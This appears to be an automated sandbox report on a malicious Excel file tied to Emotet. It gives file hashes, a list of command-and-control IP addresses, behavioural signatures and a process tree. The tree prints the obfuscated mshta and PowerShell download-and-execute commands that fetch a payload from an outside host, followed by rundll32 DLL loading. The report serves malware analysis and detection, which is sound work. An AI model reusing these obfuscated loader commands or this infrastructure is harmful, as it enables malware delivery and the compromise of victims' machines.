Analysis
-
max time kernel
110s -
max time network
141s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
21-01-2022 13:00
Behavioral task
behavioral1
Sample
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
Resource
win7-en-20211208
General
-
Target
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls
-
Size
71KB
-
MD5
21fc12ef8a4a4ba5b38a303fa7e70c08
-
SHA1
5700a2231371b289eae19ce62e1a73457ee582c4
-
SHA256
6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5
-
SHA512
8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654
Malware Config
Extracted
http://0xb907d607/fer/fe2.html
Extracted
http://185.7.214.7/fer/fe2.png
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3820 2668 cmd.exe EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 25 1212 mshta.exe 30 1720 powershell.exe 32 1720 powershell.exe 45 968 rundll32.exe 46 968 rundll32.exe -
Downloads MZ/PE file
-
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Nhxledswqynbmquy\qivdsgsiy.dif rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3740 1212 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2668 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
WerFault.exerundll32.exepid process 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 3740 WerFault.exe 968 rundll32.exe 968 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
WerFault.exedescription pid process Token: SeDebugPrivilege 3740 WerFault.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
EXCEL.EXEcmd.exemshta.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2668 wrote to memory of 3820 2668 EXCEL.EXE cmd.exe PID 2668 wrote to memory of 3820 2668 EXCEL.EXE cmd.exe PID 3820 wrote to memory of 1212 3820 cmd.exe mshta.exe PID 3820 wrote to memory of 1212 3820 cmd.exe mshta.exe PID 1212 wrote to memory of 1720 1212 mshta.exe powershell.exe PID 1212 wrote to memory of 1720 1212 mshta.exe powershell.exe PID 1936 wrote to memory of 3384 1936 cmd.exe rundll32.exe PID 1936 wrote to memory of 3384 1936 cmd.exe rundll32.exe PID 1936 wrote to memory of 3384 1936 cmd.exe rundll32.exe PID 3384 wrote to memory of 2036 3384 rundll32.exe rundll32.exe PID 3384 wrote to memory of 2036 3384 rundll32.exe rundll32.exe PID 3384 wrote to memory of 2036 3384 rundll32.exe rundll32.exe PID 2036 wrote to memory of 3692 2036 rundll32.exe rundll32.exe PID 2036 wrote to memory of 3692 2036 rundll32.exe rundll32.exe PID 2036 wrote to memory of 3692 2036 rundll32.exe rundll32.exe PID 3692 wrote to memory of 968 3692 rundll32.exe rundll32.exe PID 3692 wrote to memory of 968 3692 rundll32.exe rundll32.exe PID 3692 wrote to memory of 968 3692 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe2.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
PID:1720 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nhxledswqynbmquy\qivdsgsiy.dif",dMGKTBdoUgBNSVX8⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Nhxledswqynbmquy\qivdsgsiy.dif",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:968 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1212 -s 18084⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740